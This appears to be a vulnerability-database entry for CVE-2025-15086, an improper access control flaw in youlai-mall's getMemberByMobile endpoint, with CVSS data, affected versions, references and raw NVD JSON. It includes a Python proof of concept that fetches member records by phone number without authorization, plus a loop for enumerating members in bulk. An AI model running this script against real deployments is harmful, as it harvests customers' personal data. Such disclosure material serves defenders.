CVE-2025-15086

Description

A weakness has been identified in youlaitech youlai-mall 1.0.0/2.0.0. This impacts the function getMemberByMobile of the file mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java. This manipulation causes improper access controls. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:youlai:youlai-mall:1.0.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:youlai:youlai-mall:2.0.0:*:*:*:*:*:*:* - VULNERABLE

youlai-mall 1.0.0

youlai-mall 2.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15086 PoC - youlai-mall Unauthorized Member Information Disclosure
# Target: youlai-mall 1.0.0/2.0.0
# Vulnerability: Improper Access Control in getMemberByMobile endpoint

def exploit_cve_2025_15086(target_url, phone_number):
    """
    Exploit function to retrieve member info by mobile number
    without proper authorization check.
    
    Args:
        target_url: Base URL of the vulnerable youlai-mall instance
        phone_number: Target phone number to query
    
    Returns:
        Response containing member information if vulnerable
    """
    endpoint = f"{target_url}/app/ums/member/getByMobile"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    # Request payload with target phone number
    data = {
        "mobile": phone_number
    }
    
    try:
        response = requests.post(endpoint, json=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            result = response.json()
            print(f"[+] Success! Retrieved member info for {phone_number}")
            print(f"[+] Response: {result}")
            return result
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

# Batch enumeration example
def enumerate_members(target_url, phone_prefix="138"):
    """
    Demonstrate batch enumeration of member information
    """
    print(f"[*] Starting enumeration on {target_url}")
    
    # Enumerate phone numbers with common prefixes
    for i in range(1000, 9999):
        phone = f"{phone_prefix}{i:04d}0000"
        result = exploit_cve_2025_15086(target_url, phone)
        
        if result and result.get("code") == 0:
            print(f"[+] Found valid member: {result}")

if __name__ == "__main__":
    TARGET = "http://vulnerable-server.com"
    PHONE = "13800138000"
    
    print("[*] CVE-2025-15086 PoC")
    print("[*] Target: youlai-mall getMemberByMobile")
    
    exploit_cve_2025_15086(TARGET, PHONE)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15086
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15086
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15086/
[4] VulDB https://vuldb.com/cve/CVE-2025-15086
[5] https://github.com/Hwwg/cve/issues/27
[6] https://vuldb.com/?ctiid.338414
[7] https://vuldb.com/?id.338414
[8] https://vuldb.com/?submit.708176

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15086", "sourceIdentifier": "[email protected]", "published": "2025-12-25T21:15:40.893", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in youlaitech youlai-mall 1.0.0/2.0.0. This impacts the function getMemberByMobile of the file mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java. This manipulation causes improper access controls. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "CDAC2C90-64E9-4C14-BDC5-36F1178708EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:youlai:youlai-mall:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E843DD0-1FE2-4487-B584-A33F72DDCBDF"}]}]}], "references": [{"url": "https://github.com/Hwwg/cve/issues/27", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338414", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338414", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.708176", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}